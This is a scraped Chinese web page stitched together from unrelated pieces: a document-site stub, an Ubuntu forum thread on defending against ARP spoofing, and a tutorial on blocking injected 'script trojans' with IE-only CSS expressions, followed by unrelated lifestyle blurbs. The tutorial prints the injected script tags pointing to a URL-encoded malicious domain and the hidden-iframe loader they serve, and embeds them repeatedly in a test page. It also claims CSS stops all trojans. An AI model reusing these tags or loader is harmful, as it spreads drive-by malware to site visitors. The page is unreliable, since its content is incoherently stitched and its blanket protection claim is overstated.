arp断网攻击怎么解决挂ARP网马

君,已阅读到文档的结尾了呢~~
[精品]网马下载拦截与恶意网址获取获取,网马,下载,网马拦截,网页木马,下载恶意,下载网址,网马生成器,php网马,怎么挂网马
扫扫二维码,随身浏览文档
手机或平板扫扫即可继续访问
[精品]网马下载拦截与恶意网址获取
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由:
将文档分享至:
分享完整地址
文档地址:
粘贴到BBS或博客
flash地址:
支持嵌入FLASH地址的网站使用
html代码:
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布,请您等待!
3秒自动关闭窗口局域网共享上网,,ubuntu能防止arp欺骗arp攻击马? - 查看主题 & Ubuntu中文论坛
&[ 8 篇帖子 ]&
&文章标题 : 局域网共享上网,,ubuntu能防止arp欺骗arp攻击马?发表于 :
16:53帖子: 7
送出感谢: 0 次
接收感谢: 0 次
局域网共享上网,,ubuntu能防止arp欺骗arp攻击马?
&文章标题 : 发表于 :
17:01帖子: 168
送出感谢: 0 次
接收感谢: 0 次
我也很想知道,我们这里的局域网蠕虫病毒泛滥,网关地址总被该,取消动态IP地址,设为静态网关也不行,arp -a会显示多出好几个网关(估计是中毒的机子,我把他们的地址记下来了),上网下东西根本不可能,因为一会就掉线,必须手动重启网络才行,真是气死我了。
谁有什么好办法吗?
&文章标题 : 发表于 :
论坛管理员
0:06帖子: 10140
系统: Ubuntu 12.04
arp -s 192.168.0.1 00-00-0A-0B-0C-0D
设置静态的网关地址
&文章标题 : 发表于 :
论坛管理员
0:06帖子: 10140
系统: Ubuntu 12.04
1) 建立静态ARP表
touch /etc/static_arp_entry
chown root:root /etc/static_arp_entry
chmod 600 /etc/static_arp_entry
2) 编辑/etc/static_arp_entry文件,输入类似内容
192.168.8.90 00:00:00:11:11:11
192.168.8.1 00:00:00:22:22:22
3) arp -s -f /etc/static_arp_entry
&文章标题 : 发表于 :
17:01帖子: 168
送出感谢: 0 次
接收感谢: 0 次
oneleaf 写道:1) 建立静态ARP表touch /etc/static_arp_entrychown root:root /etc/static_arp_entrychmod 600 /etc/static_arp_entry2) 编辑/etc/static_arp_entry文件,输入类似内容192.168.8.90 00:00:00:11:11:11192.168.8.1 00:00:00:22:22:223) arp -s -f /etc/static_arp_entry
按照这个做了,网关地址别人是改不了了,但总有一些新的地址加进来,根本不是网关,甚至有一台我们宿舍的电脑,总出现在我的arp列表里,请问如何防止这类事情?另外,这是否和我开通了samba有关系,那台电脑将我共享的文件夹映射为一个驱动器,是不是这个原因引起的?谢谢!
&文章标题 : 发表于 :
17:01帖子: 168
送出感谢: 0 次
接收感谢: 0 次
能不能拒绝某个ip地址连接啊?在不用防火墙的情况下?firestarter不支持教育网直通车的虚拟拨号!
&文章标题 : 发表于 :
21:21帖子: 46
送出感谢: 0 次
接收感谢: 0 次
ubuntu不能阻止apr欺骗
&文章标题 : 发表于 :
15:37帖子: 23地址: 江西南昌
送出感谢: 0 次
接收感谢: 0 次
还是从客户机的安全性着手吧,它要总把自己的MAC改得跟网关的一样还总叫为什么老上不了网,这肯定不行,去看下人家清华是怎么做的?叫局域网里的机子都去下补丁(肯定是WINDOWS的了)还有就是有必要布署杀毒软件和防火墙,要是谁的机子中了,就把它隔离起来,跟当年防非典差不多,哈哈,我想应该是个好方法,不然总是没完没了,解决了不问题。
PS:MICROSOFT的安全更新和安全软件应该是解决不了问题的,但是总可以防止局域网里的其他机子在无意中中马。要有人在局域网里搞东西,你只有把他抓出来,从重处理,以敬效尤。
显示帖子 : 全部帖子1天7天2周1个月3个月6个月1年&排序 作者发表时间文章标题 升序降序&
&[ 8 篇帖子 ]&
正在浏览此版面的用户:Exabot [Bot] 和 2 位游客
您 不能 在这个版面发表主题您 不能 在这个版面回复主题您 不能 在这个版面编辑帖子您 不能 在这个版面删除帖子您 不能 在这个版面提交附件
选择一个版面
------------------
公告/注意事项
& &新闻和通知
& &校园社团支持
& && &华东校区
& && &华南校区
& && &华北校区
& && &华中校区
& && &东北校区
& && &西北校区
& && &港澳台校区
& && &国外校区
& &软件推荐
& &非常任务
系统***区
& &教学和常见问答
& && &课堂教学和培训
& &初学者园地 - 17.04 - Zesty Zapus
& &系统***和升级
& && &新立得和软件源
& && &Wubi***讨论
& &启动和引导
& &网卡问题以及网络和拨号
& && &校园网拨号
& &笔记本、UMPC支持
& &手机和平板
& && &Ubuntu移动应用开发
& &常用硬件支持
& &系统架构支持
配置美化区
& &字体美化和中文支持
& && &个人配置文件存放点
& &桌面特效
& &窗口管理器
& &屏幕抓图
& &办公、图像、机械电子设计等
& && &Vim和Emacs
& &因特网相关软件
& &影音多媒体
& &Wine及其分支
& &游戏和游戏模拟器
& &虚拟机和虚拟化
& &其它类软件
& &开源模板库
服务器管理
& &服务器基础应用
& &数据库管理
& &服务器维护和硬件相关
& &Ubuntu VPS
参与Ubuntu开发
& &软件和文档翻译
& &编译或打包
& &Ubuntu错误报告
程序设计区
& &Shell脚本
& >K+和QT
& &软件/网站开发
& && &Python/Php/Perl
& && &C/C++/Java
& &内核及嵌入式开发
& &开源小工具
& &Ubuntu 17.10
& &Ubuntu 16.04 LTS
& &Ubuntu 14.04 LTS
& &Ubuntu 12.04 LTS
& &Ubuntu 10.04 LTS
& &老旧版本支持
& && &Ubuntu 15.10
& && &Ubuntu 15.04
& && &Ubuntu 14.10
衍生发行版
& &Ubuntu GNOME
& &Kubuntu
& &Xubuntu & Lubuntu
& &Ubuntu中文衍生版
& && &UbuntuKylin
& &Ubuntu国外衍生版
& && &Mint
& &Ubuntu衍生版制作
& &其它类Unix OS发行版
& && &Arch发行版
& && &Debian发行版
& && &OpenSUSE发行版
& && &Deepin
& &深度PK版
& &Ubuntu故事和感慨
& &Full Circle开源杂志
分享交流区
& &同城交流
& &线下活动专版
& &Ubuntu宣传推广
& &论坛管理
& && && &Ubuntu中文网上商店二行代码解决全部网页木马
想不想get新技能酷炫一下,今天图老师小编就跟大家分享个简单的二行代码解决全部网页木马教程,一起来看看吧!超容易上手~
  还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。  前不久《/thread--1.html一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂script木马,汗了,看了几个网友的网站都被这样了页面的顶部或底部加上了:  注意,以下地址含有木马,请不要轻易访问:  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=http://%76%63%63%64%2E%63%6E/script  汗死,一连插入了N个一样的script标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:  document.write(&div style='display:none'&)  document.write(&iframe src=/b1.htm?id=017 width=0 height=0/iframe&)  document.write(&/div&)  又用迅雷下载/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!  ...  var Kfqq, Qqs=&[color=Magenta][/color]&; qwfgsg=&LLLLXXXXXLD&; Kfqq = Q  (...略)(下面还有N个统计的JS代码)  针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了***。大家来看看,script木马的特点是什么:  script src=http://%76%63%63%64%2E%63%6E/script  对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他object代码,不管这么多,来多少杀多少。  来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:  解决方案1:  iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/  script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}  原理:将script标记的src拿出来转为小写,再看是不是以http开头的外域JS脚本文件,如果是,则页面内容清空并写出木马被成功隔离!。反之正常显示。  缺点:访客无法看到被感染了script木马的页面。  解决方案2:  iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}  script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}  原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。  解决方案3:  iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}  script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}  原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的停止按钮一样。看来这是JS模拟IE停止按钮的一种方法。  解决方案4:  iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}  script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}  原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。  解决方案5:  iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}  script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}  第五种方案的页面HTML源代码script中要加入以&lh&为前缀的id,如lhWeatherJSapi,script src=&***/**.js& id=&lhSearchJSapi&/script   以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)  !DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Transitional//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&  html xmlns=&http://www.w3.org/1999/xhtml&  head  meta http-equiv=&Content-Type& content=&text/ charset=utf-8& /  title让JS木马的进程迅速中止的CSS代码/title  style type=&text/css& id=&LinrStudio&  /*![CDATA[*/  iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}  script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}  /* 以后请在此关注最新木马处理方法:/ff/api.htm */  /*]]*/  /style  /head  body  script type=&text/javascript& src=&1.js&/script  script src=http://%76%63%63%64%2E%63%6E/script  script src=&http://%76%63%63%64%2E%63%6E& type=&text/javascript&/script  script src=http://%76%63%63%64%2E%63%6E/script  我是页面本身的1  script src=http://%76%63%63%64%2E%63%6E/script  我是页面本身的2  script src=http://%76%63%63%64%2E%63%6E/script  我是页面本身的3  script src=http://%76%63%63%64%2E%63%6E/script  /body  /html  其中1.js是自己本站的:  document.write(&我是本站的JS文件&);  document.write(&img src='/images/Logo.gif' /&);  我的测试环境是:  Windows XP SP2 和windows Vista SP1  IE6/IE7/IE8  已全部打好补丁。  综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。  大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。
来源:/n/2499.html
热门搜索:
外景花朵清新日系色调 PS调色教程
怎么在excel里添加误差线
excel里如何添加误差线
手把手教你怎样删除资源管理历史记录
PS图片调色教程 将美女打造出柔美感
您可能会发现,经常看到在短视频有人在表演的时候说一些鼓励的话,然后就是双击666,听的您或许摸不清头脑,我就在这里为您解答一下,请给我点赞,让我解答更加有动力。
您是否熟悉我们生活的城市是怎么命名而来的呢?中国城市的命名可是有很深的文化底蕴和历史背景的,你都知道么?我从网上搜集了大量的城市名来源,让您好好的涨涨知识,您准备好了吗?
对于爱美人士来说,美白护肤是不分季节的,即使在冬季,依然需要做好皮肤护理工作。饮食调理是护肤的一项重要措施,那么冬天美白吃什么水果呢?接下来就和我一起来看看了解一下冬季美白吃什么水果好!
产妇顺产以后多久可以洗头发?有很多产妇为了防止自己受寒所以在产后不让自己洗头发,但是又特别难受,这篇文章讲述了产妇顺产以后多长时间可以洗头发,通过这篇文章了解产妇顺产以后多久可以洗头发吧。
阴阳师是现在相当火热的一款手游,最近阴阳师又有了新的更新,玩家可以通过挑战副本来获取妖刀姬樱雨刀舞皮肤。可是的很多人不知道阴阳师妖刀姬副本阵容是怎样的,下面就给大家来详细介绍吧。
阴阳师是现在很火热的一款手机游戏,这款游戏一直在更新完善,受到很多人的追捧,就在最近阴阳师又推出了小鹿男,小鹿男作为SSR式神,很多人对它还不是很了解,下面就给大家来介绍阴阳师小鹿男御魂以及阵容搭配吧。
我们在玩阴阳师完成悬赏任务的时候,都会要求玩家找到各种式神的位置,可是很多人不知道阴阳师跳跳哥哥在哪里刷、哪里多,下面就给大家来详细介绍吧,希望对大家玩游戏有所帮助。
京津冀及周边地区出现持续雾霾天气,很是让孕妈妈们担心。持续的雾霾天气对孕妇产生了很大的影响,那么雾霾天气对孕妇危害有多大?雾霾天气孕妇怎么办?下面的文章详细介绍 了雾霾天气对孕妇的危害,一起来看看吧。
我们知道宝宝刚刚出生的时候口腔里是没有牙齿的,一般孩子在四个月以后慢慢开始出牙,每个孩子的体质不一样,所以出牙的时间也是有所差异的,宝宝出牙的时候身体会出现一些症状,家长们要及时的护理好,下面一起来看看宝宝长牙的症状有哪些。
肚子上的赘肉看上去让人烦恼,尤其是对于想穿裙子的女生来说更是一件郁闷的事情。现在减肥的方法有很多,但是很多人并不知道专门瘦肚子的方法。那么,如何瘦肚子呢?下面就给大家介绍几种减肚子的方法吧。

参考资料

 

随机推荐